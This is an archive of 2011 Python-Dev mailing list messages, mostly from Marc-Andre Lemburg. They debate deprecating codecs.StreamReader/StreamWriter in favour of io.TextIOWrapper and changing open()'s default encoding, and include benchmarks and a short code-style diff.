Software, Skills and Services GmbH Pastor-Loeh-Str.48 D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg Registered at Amtsgericht Duesseldorf: HRB 46611 http://www.egenix.com/company/contact/ Victor --- PEP: xxx Title: Deprecate codecs.StreamReader and codecs.StreamWriter Version: $Revision$ Last-Modified: $Date$ Author: Victor Stinner Status: Draft Type: Standards Track Content-Type: text/x-rst Created: 28-May-2011 Python-Version: 3.3 Abstract io.TextIOWrapper and codecs.StreamReaderWriter offer the same API [#f1]_. TextIOWrapper has more features and is faster than StreamReaderWriter. Duplicate code means that bugs should be fixed twice and that we may have subtle differences between the two implementations. The codecs modules was introduced in Python 2.0, see the PEP 100. The io module was introduced in Python 2.6 and 3.0 (see the PEP 3116), and reimplemented in C in Python 2.7 and 3.1. Motivation == When the Python I/O model was updated for 3.0, the concept of a stream-with-known-encoding was introduced in the form of io.TextIOWrapper. As this class is critical to the performance of text-based I/O in Python 3, this module has an optimised C version which is used by CPython by default. Many corner cases in handling buffering, stateful codecs and universal newlines have been dealt with since the release of Python 3.0. This new interface overlaps heavily with the legacy codecs.StreamReader, codecs.StreamWriter and codecs.StreamReaderWriter interfaces that were part of the original codec interface design in PEP 100. These interfaces are organised around the principle of an encoding with an associated stream (i.e. the reverse of arrangement in the io module), so the original PEP 100 design required that codec writers provide appropriate StreamReader and StreamWriter implementations in addition to the core codec encode() and decode() methods. This places a heavy burden on codec authors providing these specialised implementations to correctly handle many of the corner cases that have now been dealt with by io.TextIOWrapper. While deeper integration between the codec and the stream allows for additional optimisations in theory, these optimisations have in practice either not been carried out and else the associated code duplication means that the corner cases that have been fixed in io.TextIOWrapper are still not handled correctly in the various StreamReader and StreamWriter implementations. Accordingly, this PEP proposes that: * codecs.open() be updated to delegate to the builtin open() in Python 3.3; * the legacy codecs.Stream* interfaces, including the streamreader and streamwriter attributes of codecs.CodecInfo be deprecated in Python 3.3 and removed in Python 3.4. Rationale = StreamReader and StreamWriter issues * StreamReader is unable to translate newlines. * StreamReaderWriter handles reads using StreamReader and writes using StreamWriter. These two classes may be inconsistent. To stay consistent, flush() must be
Re: [Python-Dev] open(): set the default encoding to 'utf-8' in Python 3.3?
Victor Stinner wrote: Le mardi 28 juin 2011 à 16:02 +0200, M.-A. Lemburg a écrit : How about a more radical change: have open() in Py3 default to opening the file in binary mode, if no encoding is given (even if the mode doesn't include 'b') ? I tried your suggested change: Python doesn't start. No surprise there: it's an incompatible change, but one that undoes a wart introduced in the Py3 transition. Guessing encodings should be avoided whenever possible. sysconfig uses the implicit locale encoding to read sysconfig.cfg, the Makefile and pyconfig.h. I think that it is correct to use the locale encoding for Makefile and pyconfig.h, but maybe not for sysconfig.cfg. Python require more changes just to run make. I was able to run make by using encoding='utf-8' in various functions (of distutils and setup.py). I didn't try the test suite, I expect too many failures. This demonstrates that Python's stdlib is still not being explicit about the encoding issues. I suppose that things just happen to work because we mostly use ASCII files for configuration and setup. -- Then I tried my suggestion (use utf-8 by default): Python starts correctly, I can build it (run make) and... the full test suite pass without any change. (I'm testing on Linux, my locale encoding is UTF-8.) I bet it would also with ascii in most cases. Which then just means that the Python build process and test suite is not a good test case for choosing a default encoding. Linux is also a poor test candidate for this, since most user setups will use UTF-8 as locale encoding. Windows, OTOH, uses all sorts of code page encodings (usually not UTF-8), so you are likely to hit the real problem cases a lot easier. -- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, Jun 29 2011) Python/Zope Consulting and Support ...http://www.egenix.com/ mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/ mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/ ::: Try our new mxODBC.Connect Python Database Interface for free ! eGenix.com Software, Skills and Services GmbH Pastor-Loeh-Str.48 D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg Registered at Amtsgericht Duesseldorf: HRB 46611 http://www.egenix.com/company/contact/ ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] open(): set the default encoding to 'utf-8' in Python 3.3?
Victor Stinner wrote: Le mercredi 29 juin 2011 à 10:18 +0200, M.-A. Lemburg a écrit : Victor Stinner wrote: Le mardi 28 juin 2011 à 16:02 +0200, M.-A. Lemburg a écrit : How about a more radical change: have open() in Py3 default to opening the file in binary mode, if no encoding is given (even if the mode doesn't include 'b') ? I tried your suggested change: Python doesn't start. No surprise there: it's an incompatible change, but one that undoes a wart introduced in the Py3 transition. Guessing encodings should be avoided whenever possible. It means that all programs written for Python 3.0, 3.1, 3.2 will stop working with the new 3.x version (let say 3.3). Users will have to migrate from Python 2 to Python 3.2, and then migration from Python 3.2 to Python 3.3 :-( I wasn't suggesting doing this for 3.3, but we may want to start the usual feature change process to make the change eventually happen. I would prefer a ResourceWarning (emited if the encoding is not specified), hidden by default: it doesn't break compatibility, and -Werror gives exactly the same behaviour that you expect. ResourceWarning is the wrong type of warning for this. I'd suggest to use a UnicodeWarning or perhaps create a new EncodingWarning instead. This demonstrates that Python's stdlib is still not being explicit about the encoding issues. I suppose that things just happen to work because we mostly use ASCII files for configuration and setup. I did more tests. I found some mistakes and sometimes the binary mode can be used, but most function really expect the locale encoding (it is the correct encoding to read-write files). I agree that it would be to have an explicit encoding=locale, but make it mandatory is a little bit rude. Again: Using a locale based default encoding will not work out in the long run. We've had those discussions many times in the past. I don't think there's anything bad with having the user require to set an encoding if he wants to read text. It makes him/her think twice about the encoding issue, which is good. And, of course, the stdlib should start using this explicit-is-better-than-implicit approach as well. Then I tried my suggestion (use utf-8 by default): Python starts correctly, I can build it (run make) and... the full test suite pass without any change. (I'm testing on Linux, my locale encoding is UTF-8.) I bet it would also with ascii in most cases. Which then just means that the Python build process and test suite is not a good test case for choosing a default encoding. Linux is also a poor test candidate for this, since most user setups will use UTF-8 as locale encoding. Windows, OTOH, uses all sorts of code page encodings (usually not UTF-8), so you are likely to hit the real problem cases a lot easier. I also ran the test suite on my patched Python (open uses UTF-8 by default) with ASCII locale encoding (LANG=C), the test suite does also pass. Many tests uses non-ASCII characters, some of them are skipped if the locale encoding is unable to encode the tested text. Thanks for checking. So the build process and test suite are indeed not suitable test cases for the problem at hand. With just ASCII files to decode, Python will simply never fail to decode the content, regardless of whether you use an ASCII, UTF-8 or some Windows code page as locale encoding. -- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, Jun 29 2011) Python/Zope Consulting and Support ...http://www.egenix.com/ mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/ mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/ ::: Try our new mxODBC.Connect Python Database Interface for free ! eGenix.com Software, Skills and Services GmbH Pastor-Loeh-Str.48 D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg Registered at Amtsgericht Duesseldorf: HRB 46611 http://www.egenix.com/company/contact/ ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] open(): set the default encoding to 'utf-8' in Python 3.3?
Victor Stinner wrote: In Python 2, open() opens the file in binary mode (e.g. file.readline() returns a byte string). codecs.open() opens the file in binary mode by default, you have to specify an encoding name to open it in text mode. In Python 3, open() opens the file in text mode by default. (It only opens the binary mode if the file mode contains b.) The problem is that open() uses the locale encoding if the encoding is not specified, which is the case *by default*. The locale encoding can be: - UTF-8 on Mac OS X, most Linux distributions - ISO-8859-1 os some FreeBSD systems - ANSI code page on Windows, e.g. cp1252 (close to ISO-8859-1) in Western Europe, cp952 in Japan, ... - ASCII if the locale is manually set to an empty string or to C, or if the environment is empty, or by default on some systems - something different depending on the system and user configuration... If you develop under Mac OS X or Linux, you may have surprises when you run your program on Windows on the first non-ASCII character. You may not detect the problem if you only write text in english... until someone writes the first letter with a diacritic. How about a more radical change: have open() in Py3 default to opening the file in binary mode, if no encoding is given (even if the mode doesn't include 'b') ? That'll make it compatible to the Py2 world again and avoid all the encoding guessing. Making such default encodings depend on the locale has already failed to work when we first introduced a default encoding in Py2, so I don't understand why we are repeating the same mistake again in Py3 (only in a different area). Note that in Py2, Unix applications often leave out the 'b' mode, since there's no difference between using it or not. Only on Windows, you'll see a difference. -- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, Jun 28 2011) Python/Zope Consulting and Support ...http://www.egenix.com/ mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/ mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/ ::: Try our new mxODBC.Connect Python Database Interface for free ! eGenix.com Software, Skills and Services GmbH Pastor-Loeh-Str.48 D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg Registered at Amtsgericht Duesseldorf: HRB 46611 http://www.egenix.com/company/contact/ ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
[Python-Dev] Python language summit on ustream.tv
Dear Python Developers, for the upcoming language summit at EuroPython, I'd like to try out whether streaming such meetings would work. I'll setup a webcam and stream the event live to a private channel on ustream.tv. These are the details in case you want to watch: URL: http://www.ustream.tv/channel/python-language-summit PWD: fpmUtuL4 Date: Sunday, 2011-06-19 Time: 10:00 - 16:00 CEST with breaks I'm not sure whether I can stream the whole summit, but at least the morning session should be possible, provided the network works on that day. Interaction will likely be a bit difficult in case we have heated discussions :-), but we'll keep the IRC channel #python-language-summit on freenode open as well. Thanks, -- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, Jun 16 2011) Python/Zope Consulting and Support ...http://www.egenix.com/ mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/ mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/ 2011-05-23: Released eGenix mx Base 3.2.0 http://python.egenix.com/ 2011-05-25: Released mxODBC 3.1.1 http://python.egenix.com/ 2011-06-20: EuroPython 2011, Florence, Italy4 days to go ::: Try our new mxODBC.Connect Python Database Interface for free ! eGenix.com Software, Skills and Services GmbH Pastor-Loeh-Str.48 D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg Registered at Amtsgericht Duesseldorf: HRB 46611 http://www.egenix.com/company/contact/ ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] cpython: Remove some extraneous parentheses and swap the comparison order to
Georg Brandl wrote: On 06/07/11 05:20, brett.cannon wrote: http://hg.python.org/cpython/rev/fc282e375703 changeset: 70695:fc282e375703 user:Brett Cannon br...@python.org date:Mon Jun 06 20:20:36 2011 -0700 summary: Remove some extraneous parentheses and swap the comparison order to prevent accidental assignment. Silences a warning from LLVM/clang 2.9. Swapping the comparison order here seems a bit inconsistent to me. There are lots of others around (e.g. len == 0 in the patch context below). Why is this one so special? I think that another developer even got told off once for these kinds of comparisons. I hope the Clang warning is only about the parentheses. I agree with Georg: if ('u' == typecode) is not well readable, since you usually put the variable part on the left and the constant part on the right of an equal comparison. If clang warns about this, clang needs to be fixed, not our C code :-) Georg files: Modules/arraymodule.c | 2 +- 1 files changed, 1 insertions(+), 1 deletions(-) diff --git a/Modules/arraymodule.c b/Modules/arraymodule.c --- a/Modules/arraymodule.c +++ b/Modules/arraymodule.c @@ -2091,7 +2091,7 @@ if (len == 0) { return PyUnicode_FromFormat(array('%c'), (int)typecode); } -if ((typecode == 'u')) +if ('u' == typecode) v = array_tounicode(a, NULL); else v = array_tolist(a, NULL); ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/mal%40egenix.com -- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, Jun 07 2011) Python/Zope Consulting and Support ...http://www.egenix.com/ mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/ mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/ 2011-05-23: Released eGenix mx Base 3.2.0 http://python.egenix.com/ 2011-05-25: Released mxODBC 3.1.1 http://python.egenix.com/ 2011-06-20: EuroPython 2011, Florence, Italy 13 days to go ::: Try our new mxODBC.Connect Python Database Interface for free ! eGenix.com Software, Skills and Services GmbH Pastor-Loeh-Str.48 D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg Registered at Amtsgericht Duesseldorf: HRB 46611 http://www.egenix.com/company/contact/ ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] Deprecate codecs.open() and StreamWriter/StreamReader
Victor Stinner wrote: Le mercredi 25 mai 2011 à 15:43 +0200, M.-A. Lemburg a écrit : For UTF-16 it would e.g. make sense to always read data in blocks with even sizes, removing the trial-and-error decoding and extra buffering currently done by the base classes. For UTF-32, the blocks should have size % 4 == 0. For UTF-8 (and other variable length encodings) it would make sense looking at the end of the (bytes) data read from the stream to see whether a complete code point was read or not, rather than simply running the decoder on the complete data set, only to find that a few bytes at the end are missing. I think that the readahead algorithm is much more faster than trying to avoid partial input, and it's not a problem to have partial input if you use an incremental decoder. Depends on where you're coming from. For non-seekable streams such as sockets or pipes, readahead is not going to work. For seekable streams, I agree that readahead is better strategy. And of course, it also makes sense to use incremental decoders for these encodings. For single character encodings, it would make sense to prefetch data in big chunks and skip all the trial and error decoding implemented by the base classes to address the above problem with variable length encodings. TextIOWrapper implements this optimization using its readahead algorithm. It does yes, but the above was an optimization specific to single character encodings, not all encodings and TextIOWrapper doesn't know anything about specific characteristics of the underlying encodings (except perhaps a few special cases). That's somewhat unfair: TextIOWrapper is implemented in C, whereas the StreamReader/Writer subclasses used by the codecs are written in Python. A fair comparison would use the Python implementation of TextIOWrapper. Do you mean that you would like to reimplement codecs in C? As use of Unicode codecs increases in Python applications, this would certainly be an approach to consider, yes. Looking at the current situation, it is better to use TextIOWrapper as it provides better performance, but since TextIOWrapper cannot (per desing) provide per-codec optimizations, this is likely to change with a codec rewrite in C of codecs that benefit a lot from such specific optimizations. It is not revelant to compare codecs and _pyio, because codecs reuses BufferedReader (of the io module, not of the _pyio module), and io is the main I/O module of Python 3. They both use whatever stream you pass in as parameter, so your TextIOWrapper benchmark will also use the BufferedReader of the io module. The point here is to compare Python to Python, not Python to C. But well, as you want, here is a benchmark comparing: _pyio.TextIOWrapper(io.open(filename, 'rb'), encoding) and codecs.open(filename, encoding) The only change with my previous bench.py script is the test_io() function : def test_io(test_func, chunk_size): with open(FILENAME, 'rb') as buffered: f = _pyio.TextIOWrapper(buffered, ENCODING) test_file(f, test_func, chunk_size) f.close() Thanks for running those tests. (1) Decode Objects/unicodeobject.c (317336 characters) from utf-8 test_io.readline(): 1193.4 ms test_codecs.readline(): 1267.9 ms - codecs 6% slower than io test_io.read(1): 21696.4 ms test_codecs.read(1): 36027.2 ms - codecs 66% slower than io test_io.read(100): 3080.7 ms test_codecs.read(100): 3901.7 ms - codecs 27% slower than io This shows that StreamReader/Writer could benefit quite a bit from using incremental encoders/decoders. test_io.read(): 3991.0 ms test_codecs.read(): 1736.9 ms - codecs 130% FASTER than io No surprise here. It's also a very common use case to read the whole file in one go and the bigger the file, the more impact this has. (2) Decode README (6613 characters) from ascii test_io.readline(): 678.1 ms test_codecs.readline(): 760.5 ms - codecs 12% slower than io test_io.read(1): 13533.2 ms test_codecs.read(1): 21900.0 ms - codecs 62% slower than io test_io.read(100): 2663.1 ms test_codecs.read(100): 3270.1 ms - codecs 23% slower than io test_io.read(): 6769.1 ms test_codecs.read(): 3919.6 ms - codecs 73% FASTER than io See above. (3) Decode Lib/test/cjkencodings/gb18030.txt (501 characters) from gb18030 test_io.readline(): 38.9 ms test_codecs.readline(): 15.1 ms - codecs 157% FASTER than io test_io.read(1): 369.8 ms test_codecs.read(1): 302.2 ms - codecs 22% FASTER than io test_io.read(100): 258.2 ms test_codecs.read(100): 155.1 ms - codecs 67% FASTER than io test_io.read(): 1803.2 ms test_codecs.read(): 1002.9 ms - codecs 80% FASTER than io These results are interesting since gb18030 is a shift encoding which keeps state in the encoded data stream, so the strategy chosen by TextIOWrapper doesn't work out that well. It hints to what I mentioned above: per codec optimizations are going to be relevant once
Re: [Python-Dev] Deprecate codecs.open() and StreamWriter/StreamReader
Victor Stinner wrote: Le vendredi 27 mai 2011 10:17:29, M.-A. Lemburg a écrit : I am still -1 on deprecating the StreamReader/Writer parts of the codec APIs. I've given numerous reasons on why these are useful, what their intention is, why they were added to Python 1.6. codecs.open() now uses TextIOWrapper, so there is no good reason to keep StreamReader or StreamWriter. You did not give me any use case where StreamReader or StreamWriter should be used instead of TextIOWrapper. You only listed theorical optimizations. You have until the release of Python 3.3 to prove that StreamReader and/or StreamWriter can be faster than TextIOWrapper. If you can prove it using a patch and a benchmark, I will be ok to revert my commit. Victor, please revert the change. It has *not* been approved ! If we'd go by your reasoning for deprecating and eventually removing parts of the stdlib or Python's subsystems, we'll end up with a barebone version of Python. That's not what we want and it's not what our users want. I have tried to explain the design decisions and reasons for those codec APIs at great length. You've pretty much used up my patience. If you are not going to revert the patch, I will. Since such a deprecation would change an important documented API, please write a PEP outlining your reasoning, including my comments, use cases and possibilities for optimizations. Ok, I will write on a PEP explaining why StreamReader and StreamWriter are deprecated. Wrong order: first write a PEP, then discuss, then get approval, then patch. -- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, May 27 2011) Python/Zope Consulting and Support ...http://www.egenix.com/ mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/ mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/ 2011-05-23: Released eGenix mx Base 3.2.0 http://python.egenix.com/ 2011-05-25: Released mxODBC 3.1.1 http://python.egenix.com/ 2011-06-20: EuroPython 2011, Florence, Italy 24 days to go ::: Try our new mxODBC.Connect Python Database Interface for free ! eGenix.com Software, Skills and Services GmbH Pastor-Loeh-Str.48 D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg Registered at Amtsgericht Duesseldorf: HRB 46611 http://www.egenix.com/company/contact/ ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] Deprecate codecs.open() and StreamWriter/StreamReader
Victor Stinner wrote: Le vendredi 27 mai 2011 15:42:10, M.-A. Lemburg a écrit : If we'd go by your reasoning for deprecating and eventually removing parts of the stdlib or Python's subsystems, we'll end up with a barebone version of Python. That's not what we want and it's not what our users want. I don't want to deprecate the whole stdlib, just duplicate old API, to follow import this mantra: There should be one-- and preferably only one --obvious way to do it. What people tend to miss in this mantra is the last part: obvious. It doesn't say: there should only be one way to do it. There can be many ways, but there should preferably be only one *obvious* way. Using codec.open() is not obvious in Python3, since the standard open() already provides a way to access an encoded stream. Using a builtin is the obvious way to go. It is obvious in Python2 where the standard open() doesn't provide a way to define an encoding, so the user has to explicitly look for this kind of API and then find it in the obvious (to some extent) codecs module, since that's where encodings happen in Python2. Having multiple ways to do things, is the most natural thing on earth and it's good that way. Python does not and should not force people into doing things in one dictated right way. It should, however, provide natural choices and obvious hints to find a good solution. And that's what the Zen mantra is all about. It's difficult for an user to choose between between open() and codecs.open(). As I mentioned on the ticket and in my replies: I'm not against changing codecs.open() to use a variant that is based on TextIOWrapper, provided there are no user noticeable compatibility issues. Thanks for reverting the patch. Have a nice weekend, -- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, May 27 2011) Python/Zope Consulting and Support ...http://www.egenix.com/ mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/ mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/ 2011-05-23: Released eGenix mx Base 3.2.0 http://python.egenix.com/ 2011-05-25: Released mxODBC 3.1.1 http://python.egenix.com/ 2011-06-20: EuroPython 2011, Florence, Italy 24 days to go ::: Try our new mxODBC.Connect Python Database Interface for free ! eGenix.com Software, Skills and Services GmbH Pastor-Loeh-Str.48 D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg Registered at Amtsgericht Duesseldorf: HRB 46611 http://www.egenix.com/company/contact/ ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] Deprecate codecs.open() and StreamWriter/StreamReader
Walter Dörwald wrote: On 24.05.11 12:58, Victor Stinner wrote: Le mardi 24 mai 2011 à 12:42 +0200, Łukasz Langa a écrit : Wiadomość napisana przez Walter Dörwald w dniu 2011-05-24, o godz. 12:16: I don't see which usecase is not covered by TextIOWrapper. But I know some cases which are not supported by StreamReader/StreamWriter. This could be be partially fixed by implementing generic StreamReader/StreamWriter classes that reuse the incremental codecs, but I don't think thats worth it. Why not? We have already an implementation of this idea, it is called io.TextIOWrapper. Exactly. From another post by Victor: As I wrote, codecs.open() is useful in Python 2. But I don't know any program or library using directly StreamReader or StreamWriter. So: implementing this is a lot of work, duplicates existing functionality and is mostly unused. You are missing the point: we have StreamReader and StreamWriter APIs on codecs to allow each codecs to implement more efficient ways of encoding and decoding streams. Examples of such optimizations are reading the stream in chunks that can be decoded in one piece, or writing to the stream in a way that doesn't generate encoding state problems on the receiving end by ending transmission half-way through a shift block. Of course, you won't find many direct uses of these APIs, since most of the time, applications will simply use codecs.open() to automatically benefit from these optimizations. OTOH, TextIOWrapper doesn't know anything about specific encodings and thus does not allow for such optimizations to be implemented by codecs. We don't have many such specialized implementations in the stdlib, but this doesn't mean that there's no use for them. It just means that developers and users are simply unaware of the possibilities opened by these stateful stream APIs. -- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, May 25 2011) Python/Zope Consulting and Support ...http://www.egenix.com/ mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/ mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/ 2011-05-23: Released eGenix mx Base 3.2.0 http://python.egenix.com/ 2011-05-25: Released mxODBC 3.1.1 http://python.egenix.com/ 2011-06-20: EuroPython 2011, Florence, Italy 26 days to go ::: Try our new mxODBC.Connect Python Database Interface for free ! eGenix.com Software, Skills and Services GmbH Pastor-Loeh-Str.48 D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg Registered at Amtsgericht Duesseldorf: HRB 46611 http://www.egenix.com/company/contact/ ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] Deprecate codecs.open() and StreamWriter/StreamReader
Victor Stinner wrote: Le mercredi 25 mai 2011 à 11:38 +0200, M.-A. Lemburg a écrit : You are missing the point: we have StreamReader and StreamWriter APIs on codecs to allow each codecs to implement more efficient ways of encoding and decoding streams. Examples of such optimizations are reading the stream in chunks that can be decoded in one piece, or writing to the stream in a way that doesn't generate encoding state problems on the receiving end by ending transmission half-way through a shift block. ... We don't have many such specialized implementations in the stdlib, but this doesn't mean that there's no use for them. It just means that developers and users are simply unaware of the possibilities opened by these stateful stream APIs. Does at least one codec implement such implementation in its StreamReader or StreamWriter class? And can't we implement such optimization in incremental encoders and decoders (or in TextIOWrapper)? I don't see how, since you need control over the file API methods in order to implement such optimizations. OTOH, adding lots of special cases to TextIOWrapper isn't a good either, since these optimizations would then only trigger for a small number of codecs and completely leave out 3rd party codecs. I checked all multibyte codecs (UTF and CJK codecs) and I don't see any of such optimization. UTF codecs handle the BOM, but don't have anything looking like an optimization. CJK codecs use multibytecodec, MultibyteStreamReader and MultibyteStreamWriter, which don't look to be optimized. But I missed maybe something? No, you haven't missed such per-codec optimizations. The base classes implement general purpose support for reading from streams in chunks, but the support isn't optimized per codec. For UTF-16 it would e.g. make sense to always read data in blocks with even sizes, removing the trial-and-error decoding and extra buffering currently done by the base classes. For UTF-32, the blocks should have size % 4 == 0. For UTF-8 (and other variable length encodings) it would make sense looking at the end of the (bytes) data read from the stream to see whether a complete code point was read or not, rather than simply running the decoder on the complete data set, only to find that a few bytes at the end are missing. For single character encodings, it would make sense to prefetch data in big chunks and skip all the trial and error decoding implemented by the base classes to address the above problem with variable length encodings. Finally, all this could be implemented in C, reducing the Python call overhead dramatically. TextIOWrapper has an advanced buffer algorithm to prefetch (readahead) some bytes at each read to speed up small read. It is difficult to implement such algorithm, but it's done and it works. -- Ok, let's stop to speak about theorical optimizations, and let's do a benchmark to compare codecs and the io modules on reading files! That's somewhat unfair: TextIOWrapper is implemented in C, whereas the StreamReader/Writer subclasses used by the codecs are written in Python. A fair comparison would use the Python implementation of TextIOWrapper. -- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, May 25 2011) Python/Zope Consulting and Support ...http://www.egenix.com/ mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/ mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/ 2011-05-23: Released eGenix mx Base 3.2.0 http://python.egenix.com/ 2011-05-25: Released mxODBC 3.1.1 http://python.egenix.com/ 2011-06-20: EuroPython 2011, Florence, Italy 26 days to go ::: Try our new mxODBC.Connect Python Database Interface for free ! eGenix.com Software, Skills and Services GmbH Pastor-Loeh-Str.48 D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg Registered at Amtsgericht Duesseldorf: HRB 46611 http://www.egenix.com/company/contact/ ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] Deprecate codecs.open() and StreamWriter/StreamReader
Victor Stinner wrote: Hi, In Python 2, codecs.open() is the best way to read and/or write files using Unicode. But in Python 3, open() is preferred with its fast io module. I would like to deprecate codecs.open() because it can be replaced by open() and io.TextIOWrapper. I would like your opinion and that's why I'm writing this email. I think you should have moved this part of your email further up, since it explains the reason why this idea was rejected for now: I opened an issue for this idea. Brett and Marc-Andree Lemburg don't want to deprecate codecs.open() friends because they want to be able to write code working on Python 2 and on Python 3 without any change. I don't think it's realistic: nontrivial programs require at least the six module, and most likely the 2to3 program. The six module can have its codecs.open function if codecs.open is removed from Python 3.4. And now for something completely different: codecs.open() and StreamReader, StreamWriter and StreamReaderWriter classes of the codecs module don't support universal newlines, still have some issues with stateful codecs (like UTF-16/32 BOMs), and each codec has to implement a StreamReader and a StreamWriter class. StreamReader and StreamWriter are stateless codecs (no reset() or setstate() method), and so it's not possible to write a generic fix for all child classes in the codecs module. Each stateful codec has to handle special cases like seek() problems. For example, UTF-16 codec duplicates some IncrementalEncoder/IncrementalDecoder code into its StreamWriter/StreamReader class. Please read PEP 100 regarding StreamReader and StreamWriter. Those codecs parts were explicitly designed to be stateful, unlike the stateless encoder/decoder methods. Please read my reply on the ticket: StreamReader and StreamWriter classes provide the base codec implementations for stateful interaction with streams. They define the interface and provide a working implementation for those codecs that choose not to implement their own variants. Each codec can, however, implement variants which are optimized for the specific encoding or intercept certain stream methods to add functionality or improve the encoding/decoding performance. Both are essential parts of the codec interface. TextIOWrapper and StreamReaderWriter are merely wrappers around streams that make use of the codecs. They don't provide any codec logic themselves. That's the conceptual difference. The io module is well tested, supports non-seekable streams, handles correctly corner-cases (like UTF-16/32 BOMs) and supports any kind of newlines including an universal newline mode. TextIOWrapper reuses incremental encoders and decoders, so BOM issues were fixed only once, in TextIOWrapper. It's trivial to replace a call to codecs.open() by a call to open(), because the two API are very close. The main different is that codecs.open() doesn't support universal newline, so you have to use open(..., newline='') to keep the same behaviour (keep newlines unchanged). This task can be done by 2to3. But I suppose that most people will be happy with the universal newline mode. I don't see which usecase is not covered by TextIOWrapper. But I know some cases which are not supported by StreamReader/StreamWriter. This is a misunderstanding of the concepts behind the two. StreamReader and StreamWriters are implemented by the codecs, they are part of the API that each codec has to provide in order to register in the Python codecs system. Their purpose is to provide a stateful interface and work efficiently and directly on streams rather than buffers. Here's my reply from the ticket regarding using incremental encoders/decoders for the StreamReader/Writer parts of the codec set of APIs: The point about having them use incremental codecs for encoding and decoding is a good one and would need to be investigated. If possible, we could use incremental encoders/decoders for the standard StreamReader/Writer base classes or add new IncrementalStreamReader/Writer classes which then use the IncrementalEncode/Decoder per default. Please open a new ticket for this. StreamReader, StreamWriter, StreamReaderEncoder and EncodedFile are not used in the Python 3 standard library. I tried removed them: except tests of test_codecs which test them directly, the full test suite pass. Read the issue for more information: http://bugs.python.org/issue8796 -- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, May 24 2011) Python/Zope Consulting and Support ...http://www.egenix.com/ mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/ mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/ 2011-06-20: EuroPython 2011, Florence, Italy 27 days to go ::: Try our new mxODBC.Connect Python Database Interface
Re: [Python-Dev] Deprecate codecs.open() and StreamWriter/StreamReader
